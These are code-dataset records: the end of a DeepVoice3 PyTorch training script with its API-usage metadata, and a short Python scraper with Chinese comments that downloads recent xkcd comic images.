specified wrong args\"\n\n # Load preset if specified\n if preset is not None:\n with open(preset) as f:\n hparams.parse_json(f.read())\n # Override hyper parameters\n hparams.parse(args[\"--hparams\"])\n\n # Preventing Windows specific error such as MemoryError\n # Also reduces the occurrence of THAllocator.c 0x05 error in Widows build of PyTorch\n if platform.system() == \"Windows\":\n print(\" [!] Windows Detected - IF THAllocator.c 0x05 error occurs SET num_workers to 1\")\n\n assert hparams.name == \"deepvoice3\"\n print(hparams_debug_string())\n\n _frontend = getattr(frontend, hparams.frontend)\n\n os.makedirs(checkpoint_dir, exist_ok=True)\n\n # Input dataset definitions\n X = FileSourceDataset(TextDataSource(data_root, speaker_id))\n Mel = FileSourceDataset(MelSpecDataSource(data_root, speaker_id))\n Y = FileSourceDataset(LinearSpecDataSource(data_root, speaker_id))\n\n # Prepare sampler\n frame_lengths = Mel.file_data_source.frame_lengths\n sampler = PartialyRandomizedSimilarTimeLengthSampler(\n frame_lengths, batch_size=hparams.batch_size)\n\n # Dataset and Dataloader setup\n dataset = PyTorchDataset(X, Mel, Y)\n data_loader = data_utils.DataLoader(\n dataset, batch_size=hparams.batch_size,\n num_workers=hparams.num_workers, sampler=sampler,\n collate_fn=collate_fn, pin_memory=hparams.pin_memory, drop_last=True)\n\n device = torch.device(\"cuda\" if use_cuda else \"cpu\")\n\n # Model\n model = build_model().to(device)\n\n optimizer = optim.Adam(model.get_trainable_parameters(),\n lr=hparams.initial_learning_rate, betas=(\n hparams.adam_beta1, hparams.adam_beta2),\n eps=hparams.adam_eps, weight_decay=hparams.weight_decay,\n amsgrad=hparams.amsgrad)\n\n if checkpoint_restore_parts is not None:\n restore_parts(checkpoint_restore_parts, model)\n\n # Load checkpoints\n if checkpoint_postnet_path is not None:\n load_checkpoint(checkpoint_postnet_path, model.postnet, optimizer, reset_optimizer)\n\n if checkpoint_seq2seq_path is not None:\n load_checkpoint(checkpoint_seq2seq_path, model.seq2seq, optimizer, reset_optimizer)\n\n if checkpoint_path is not None:\n load_checkpoint(checkpoint_path, model, optimizer, reset_optimizer)\n\n # Load embedding\n if load_embedding is not None:\n print(\"Loading embedding from {}\".format(load_embedding))\n _load_embedding(load_embedding, model)\n\n # Setup summary writer for tensorboard\n if log_event_path is None:\n if platform.system() == \"Windows\":\n log_event_path = \"log/run-test\" + str(datetime.now()).replace(\" \", \"_\").replace(\":\", \"_\")\n else:\n log_event_path = \"log/run-test\" + str(datetime.now()).replace(\" \", \"_\")\n print(\"Log event path: {}\".format(log_event_path))\n writer = SummaryWriter(log_event_path)\n\n # Train!\n try:\n train(device, model, data_loader, optimizer, writer,\n init_lr=hparams.initial_learning_rate,\n checkpoint_dir=checkpoint_dir,\n checkpoint_interval=hparams.checkpoint_interval,\n nepochs=hparams.nepochs,\n clip_thresh=hparams.clip_thresh,\n train_seq2seq=train_seq2seq, train_postnet=train_postnet)\n except KeyboardInterrupt:\n save_checkpoint(\n model, optimizer, global_step, checkpoint_dir, global_epoch,\n train_seq2seq, train_postnet)\n\n print(\"Finished\")\n sys.exit(0)\n", "repo_name": "r9y9/deepvoice3_pytorch", "sub_path": "train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 38196, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1900, "dataset": "github-code", "pt": "53", "api": [{"api_name": "torch.cuda.is_available", "line_number": 60, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 60, "usage_type": "attribute"}, {"api_name": "torch.backends.cudnn.benchmark", "line_number": 62, "usage_type": "attribute"}, {"api_name": "torch.backends.cudnn", "line_number": 62, "usage_type": "name"}, {"api_name": "numpy.pad", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.pad", "line_number": 73, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 79, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 89, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 89, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 90, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 90, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 91, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 91, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 92, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 92, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 93, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 93, "usage_type": "name"}, {"api_name": "nnmnkwii.datasets.FileDataSource", "line_number": 96, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 105, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 117, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 118, "usage_type": "call"}, {"api_name": "deepvoice3_pytorch.frontend", "line_number": 133, "usage_type": "argument"}, {"api_name": "hparams.hparams.frontend", "line_number": 133, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 133, "usage_type": "name"}, {"api_name": "hparams.hparams.replace_pronunciation_prob", "line_number": 134, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 134, "usage_type": "name"}, {"api_name": "platform.system", "line_number": 136, "usage_type": "call"}, {"api_name": "hparams.hparams", "line_number": 137, "usage_type": "argument"}, {"api_name": "numpy.random.rand", "line_number": 139, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 139, "usage_type": "attribute"}, {"api_name": "hparams.hparams.gc_probability", "line_number": 139, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 139, "usage_type": "name"}, {"api_name": "gc.collect", "line_number": 140, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 144, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 144, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 146, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 146, "usage_type": "attribute"}, {"api_name": "nnmnkwii.datasets.FileDataSource", "line_number": 149, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 157, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 167, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 173, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 174, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 175, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 182, "usage_type": "call"}, {"api_name": "torch.utils.data.sampler.Sampler", "line_number": 195, "usage_type": "name"}, {"api_name": "torch.sort", "line_number": 205, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 205, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 223, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 227, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 228, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 234, "usage_type": "call"}, {"api_name": "torch.arange", "line_number": 265, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 274, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 274, "usage_type": "name"}, {"api_name": "torch.nn.L1Loss", "line_number": 277, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 277, "usage_type": "name"}, {"api_name": "hparams.hparams.outputs_per_step", "line_number": 295, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 295, "usage_type": "name"}, {"api_name": "hparams.hparams.downsample_step", "line_number": 296, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 296, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 318, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 318, "usage_type": "attribute"}, {"api_name": "torch.LongTensor", "line_number": 319, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 321, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 322, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 324, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 325, "usage_type": "attribute"}, {"api_name": "torch.FloatTensor", "line_number": 326, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 328, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 329, "usage_type": "attribute"}, {"api_name": "torch.FloatTensor", "line_number": 330, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 333, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 333, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 334, "usage_type": "attribute"}, {"api_name": "torch.LongTensor", "line_number": 335, "usage_type": "call"}, {"api_name": "torch.arange", "line_number": 345, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 349, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 349, "usage_type": "call"}, {"api_name": "torch.FloatTensor", "line_number": 352, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 355, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 364, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 364, "usage_type": "name"}, {"api_name": "hparams.hparams.builder", "line_number": 369, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 369, "usage_type": "name"}, {"api_name": "numpy.min", "line_number": 374, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 374, "usage_type": "call"}, {"api_name": "numpy.flip", "line_number": 375, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 376, "usage_type": "call"}, {"api_name": "matplotlib.cm.magma", "line_number": 376, "usage_type": "call"}, {"api_name": "matplotlib.cm", "line_number": 376, "usage_type": "name"}, {"api_name": "synthesis._frontend", "line_number": 390, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 392, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 393, "usage_type": "call"}, {"api_name": "hparams.hparams.n_speakers", "line_number": 400, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 400, "usage_type": "name"}, {"api_name": "synthesis.tts", "line_number": 405, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 407, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 407, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 410, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 415, "usage_type": "call"}, {"api_name": "matplotlib.cm.viridis", "line_number": 415, "usage_type": "call"}, {"api_name": "matplotlib.cm", "line_number": 415, "usage_type": "name"}, {"api_name": "numpy.flip", "line_number": 415, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 417, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 424, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 427, "usage_type": "call"}, {"api_name": "audio.save_wav", "line_number": 429, "usage_type": "call"}, {"api_name": "hparams.hparams.sample_rate", "line_number": 433, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 433, "usage_type": "name"}, {"api_name": "warnings.warn", "line_number": 435, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 454, "usage_type": "call"}, {"api_name": "matplotlib.cm.viridis", "line_number": 454, "usage_type": "call"}, {"api_name": "matplotlib.cm", "line_number": 454, "usage_type": "name"}, {"api_name": "numpy.flip", "line_number": 455, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 457, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 459, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 460, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 464, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 467, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 468, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 469, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 475, "usage_type": "call"}, {"api_name": "matplotlib.cm.viridis", "line_number": 475, "usage_type": "call"}, {"api_name": "matplotlib.cm", "line_number": 475, "usage_type": "name"}, {"api_name": "numpy.flip", "line_number": 476, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 478, "usage_type": "call"}, {"api_name": "audio._denormalize", "line_number": 483, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 488, "usage_type": "call"}, {"api_name": "audio._denormalize", "line_number": 494, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 499, "usage_type": "call"}, {"api_name": "audio.inv_spectrogram", "line_number": 503, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 504, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 504, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 505, "usage_type": "call"}, {"api_name": "hparams.hparams.sample_rate", "line_number": 509, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 509, "usage_type": "name"}, {"api_name": "warnings.warn", "line_number": 511, "usage_type": "call"}, {"api_name": "audio.save_wav", "line_number": 513, "usage_type": "call"}, {"api_name": "audio._denormalize", "line_number": 518, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 522, "usage_type": "call"}, {"api_name": "audio._denormalize", "line_number": 528, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 533, "usage_type": "call"}, {"api_name": "torch.log", "line_number": 538, "usage_type": "call"}, {"api_name": "torch.nn.L1Loss", "line_number": 549, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 549, "usage_type": "name"}, {"api_name": "hparams.hparams.masked_loss_weight", "line_number": 551, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 551, "usage_type": "name"}, {"api_name": "hparams.hparams.binary_divergence_weight", "line_number": 572, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 572, "usage_type": "name"}, {"api_name": "torch.log1p", "line_number": 576, "usage_type": "call"}, {"api_name": "torch.exp", "line_number": 576, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 587, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 587, "usage_type": "attribute"}, {"api_name": "numpy.exp", "line_number": 590, "usage_type": "call"}, {"api_name": "numba.jit", "line_number": 585, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 597, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 597, "usage_type": "attribute"}, {"api_name": "hparams.hparams.outputs_per_step", "line_number": 610, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 610, "usage_type": "name"}, {"api_name": "hparams.hparams.downsample_step", "line_number": 611, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 611, "usage_type": "name"}, {"api_name": "torch.nn.BCELoss", "line_number": 614, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 614, "usage_type": "name"}, {"api_name": "tqdm.tqdm", "line_number": 623, "usage_type": "call"}, {"api_name": "hparams.hparams.lr_schedule", "line_number": 627, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 627, "usage_type": "name"}, {"api_name": "hparams.hparams.lr_schedule", "line_number": 628, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 628, "usage_type": "name"}, {"api_name": "hparams.hparams.lr_schedule_kwargs", "line_number": 630, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 630, "usage_type": "name"}, {"api_name": "hparams.hparams.max_positions", "line_number": 647, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 647, "usage_type": "name"}, {"api_name": "hparams.hparams.max_positions", "line_number": 652, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 652, "usage_type": "name"}, {"api_name": "hparams.hparams.masked_loss_weight", "line_number": 666, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 666, "usage_type": "name"}, {"api_name": "hparams.hparams.binary_divergence_weight", "line_number": 704, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 704, "usage_type": "name"}, {"api_name": "hparams.hparams.priority_freq", "line_number": 718, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 718, "usage_type": "name"}, {"api_name": "hparams.hparams.sample_rate", "line_number": 718, "usage_type": "attribute"}, {"api_name": "hparams.hparams.priority_freq_weight", "line_number": 722, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 722, "usage_type": "name"}, {"api_name": "hparams.hparams.use_guided_attention", "line_number": 734, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 734, "usage_type": "name"}, {"api_name": "hparams.hparams.guided_attention_sigma", "line_number": 737, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 737, "usage_type": "name"}, {"api_name": "torch.from_numpy", "line_number": 738, "usage_type": "call"}, {"api_name": "hparams.hparams.eval_interval", "line_number": 750, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 750, "usage_type": "name"}, {"api_name": "torch.nn.utils.clip_grad_norm_", "line_number": 757, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 757, "usage_type": "attribute"}, {"api_name": "hparams.hparams.use_guided_attention", "line_number": 772, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 772, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 800, "usage_type": "call"}, {"api_name": "hparams.hparams.save_optimizer_state", "line_number": 802, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 802, "usage_type": "name"}, {"api_name": "torch.save", "line_number": 803, "usage_type": "call"}, {"api_name": "deepvoice3_pytorch.builder", "line_number": 813, "usage_type": "argument"}, {"api_name": "hparams.hparams.builder", "line_number": 813, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 813, "usage_type": "name"}, {"api_name": "hparams.hparams.n_speakers", "line_number": 814, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 814, "usage_type": "name"}, {"api_name": "hparams.hparams.speaker_embed_dim", "line_number": 815, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 815, "usage_type": "name"}, {"api_name": "hparams.hparams.text_embed_dim", "line_number": 817, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 817, "usage_type": "name"}, {"api_name": "hparams.hparams.num_mels", "line_number": 818, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 818, "usage_type": "name"}, {"api_name": "hparams.hparams.fft_size", "line_number": 819, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 819, "usage_type": "name"}, {"api_name": "hparams.hparams.outputs_per_step", "line_number": 820, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 820, "usage_type": "name"}, {"api_name": "hparams.hparams.downsample_step", "line_number": 821, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 821, "usage_type": "name"}, {"api_name": "hparams.hparams.padding_idx", "line_number": 822, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 822, "usage_type": "name"}, {"api_name": "hparams.hparams.dropout", "line_number": 823, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 823, "usage_type": "name"}, {"api_name": "hparams.hparams.kernel_size", "line_number": 824, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 824, "usage_type": "name"}, {"api_name": "hparams.hparams.encoder_channels", "line_number": 825, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 825, "usage_type": "name"}, {"api_name": "hparams.hparams.decoder_channels", "line_number": 826, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 826, "usage_type": "name"}, {"api_name": "hparams.hparams.converter_channels", "line_number": 827, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 827, "usage_type": "name"}, {"api_name": "hparams.hparams.use_memory_mask", "line_number": 828, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 828, "usage_type": "name"}, {"api_name": "hparams.hparams.trainable_positional_encodings", "line_number": 829, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 829, "usage_type": "name"}, {"api_name": "hparams.hparams.force_monotonic_attention", "line_number": 830, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 830, "usage_type": "name"}, {"api_name": "hparams.hparams.use_decoder_state_for_postnet_input", "line_number": 831, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 831, "usage_type": "name"}, {"api_name": "hparams.hparams.max_positions", "line_number": 832, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 832, "usage_type": "name"}, {"api_name": "hparams.hparams.speaker_embedding_weight_std", "line_number": 833, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 833, "usage_type": "name"}, {"api_name": "hparams.hparams.freeze_embedding", "line_number": 834, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 834, "usage_type": "name"}, {"api_name": "hparams.hparams.window_ahead", "line_number": 835, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 835, "usage_type": "name"}, {"api_name": "hparams.hparams.window_backward", "line_number": 836, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 836, "usage_type": "name"}, {"api_name": "hparams.hparams.key_projection", "line_number": 837, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 837, "usage_type": "name"}, {"api_name": "hparams.hparams.value_projection", "line_number": 838, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 838, "usage_type": "name"}, {"api_name": "torch.load", "line_number": 845, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 847, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 897, "usage_type": "call"}, {"api_name": "docopt.docopt", "line_number": 901, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 915, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 915, "usage_type": "call"}, {"api_name": "hparams.hparams.parse_json", "line_number": 937, "usage_type": "call"}, {"api_name": "hparams.hparams", "line_number": 937, "usage_type": "name"}, {"api_name": "hparams.hparams.parse", "line_number": 939, "usage_type": "call"}, {"api_name": "hparams.hparams", "line_number": 939, "usage_type": "name"}, {"api_name": "platform.system", "line_number": 943, "usage_type": "call"}, {"api_name": "hparams.hparams.name", "line_number": 946, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 946, "usage_type": "name"}, {"api_name": "hparams.hparams_debug_string", "line_number": 947, "usage_type": "call"}, {"api_name": "deepvoice3_pytorch.frontend", "line_number": 949, "usage_type": "argument"}, {"api_name": "hparams.hparams.frontend", "line_number": 949, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 949, "usage_type": "name"}, {"api_name": "os.makedirs", "line_number": 951, "usage_type": "call"}, {"api_name": "nnmnkwii.datasets.FileSourceDataset", "line_number": 954, "usage_type": "call"}, {"api_name": "nnmnkwii.datasets.FileSourceDataset", "line_number": 955, "usage_type": "call"}, {"api_name": "nnmnkwii.datasets.FileSourceDataset", "line_number": 956, "usage_type": "call"}, {"api_name": "hparams.hparams.batch_size", "line_number": 961, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 961, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 965, "usage_type": "call"}, {"api_name": "torch.utils.data", "line_number": 965, "usage_type": "name"}, {"api_name": "hparams.hparams.batch_size", "line_number": 966, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 966, "usage_type": "name"}, {"api_name": "hparams.hparams.num_workers", "line_number": 967, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 967, "usage_type": "name"}, {"api_name": "hparams.hparams.pin_memory", "line_number": 968, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 968, "usage_type": "name"}, {"api_name": "torch.device", "line_number": 970, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 975, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 975, "usage_type": "name"}, {"api_name": "hparams.hparams.initial_learning_rate", "line_number": 976, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 976, "usage_type": "name"}, {"api_name": "hparams.hparams.adam_beta1", "line_number": 977, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 977, "usage_type": "name"}, {"api_name": "hparams.hparams.adam_beta2", "line_number": 977, "usage_type": "attribute"}, {"api_name": "hparams.hparams.adam_eps", "line_number": 978, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 978, "usage_type": "name"}, {"api_name": "hparams.hparams.weight_decay", "line_number": 978, "usage_type": "attribute"}, {"api_name": "hparams.hparams.amsgrad", "line_number": 979, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 979, "usage_type": "name"}, {"api_name": "platform.system", "line_number": 1001, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 1002, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 1002, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 1004, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 1004, "usage_type": "name"}, {"api_name": "tensorboardX.SummaryWriter", "line_number": 1006, "usage_type": "call"}, {"api_name": "hparams.hparams.initial_learning_rate", "line_number": 1011, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 1011, "usage_type": "name"}, {"api_name": "hparams.hparams.checkpoint_interval", "line_number": 1013, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 1013, "usage_type": "name"}, {"api_name": "hparams.hparams.nepochs", "line_number": 1014, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 1014, "usage_type": "name"}, {"api_name": "hparams.hparams.clip_thresh", "line_number": 1015, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 1015, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 1023, "usage_type": "call"}]}
+{"seq_id": "9121433617", "text": "\r\nimport requests as R\r\nfrom bs4 import BeautifulSoup \r\nimport os\r\nimport re\r\nimport time\r\nimport urllib.request #下載圖片\r\n\r\ndef get_page(url):\r\n #得到page\r\n headers = {\"user-agent\" : \r\n \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36\"\r\n }\r\n resp = R.get(url, headers = headers)\r\n if resp.status_code != 200:\r\n print(\"NG\")\r\n quit()\r\n return resp.text\r\n\r\ndef download(url,name):\r\n #下載圖片用\r\n urllib.request.urlretrieve(url,\"xkcd\\\\\" + name)\r\n print(\"Processing:%s...\" %name)\r\n time.sleep(1)\r\nif __name__ == \"__main__\":\r\n\r\n number = int(input(\"請輸入下載圖片數量\\n\"))\r\n if not os.path.exists(\"xkcd\"): #判斷資料夾是否存在\r\n os.mkdir(\"xkcd\")\r\n\r\n html = get_page(\"https://xkcd.com/\") #第一次先用https://xkcd.com/ 來找最新網址篇數\r\n pars = BeautifulSoup(html,\"html.parser\")\r\n latest_url = pars.find(\"meta\", property =\"og:url\").get(\"content\") #這裡存放最新的文章篇數\r\n\r\n #利用正規表達法來取得最新數字-----------\r\n rule = re.compile(r\"\\d\\d\\d\\d\") #re\r\n latest_number = rule.search(latest_url)\r\n temp_number = int(latest_number.group())\r\n #---------------------------------\r\n\r\n for i in range(number): #利用下載次數來求文章篇數\r\n temp_number = temp_number - i \r\n #每次都扣i 往前瀏覽 例如: 2565 - 1 = 2564 // 2565 -2 = 2563...\r\n html = get_page(\"https://xkcd.com/\" + str(temp_number)) #接下來用得到的數字開始做迴圈\r\n pars = BeautifulSoup(html,\"html.parser\")\r\n pic_link = pars.find(\"div\", id=\"comic\").find(\"img\").get(\"src\")\r\n pic_link = \"http:\" + pic_link\r\n #取得連結\r\n rule = re.compile(r\"s/(.*)\") #取得圖檔名稱\r\n temp = rule.search(pic_link)\r\n pic_name = temp.group()[2:]\r\n #取得圖檔名稱\r\n download(pic_link, pic_name)\r\n\r\n\r\n\r\n\r\n", "repo_name": "Jason-Huang-S/Python-web-crawler", "sub_path": "下載指定頁數的圖片.py", "file_name": "下載指定頁數的圖片.py", "file_ext": "py", "file_size_in_byte": 1980, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.get", "line_number": 14, "usage_type": "call"}, {"api_name": "urllib.request.request.urlretrieve", "line_number": 22, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 22, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 22, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 29, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 32, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 36, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 45, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 49, "usage_type": "call"}]}
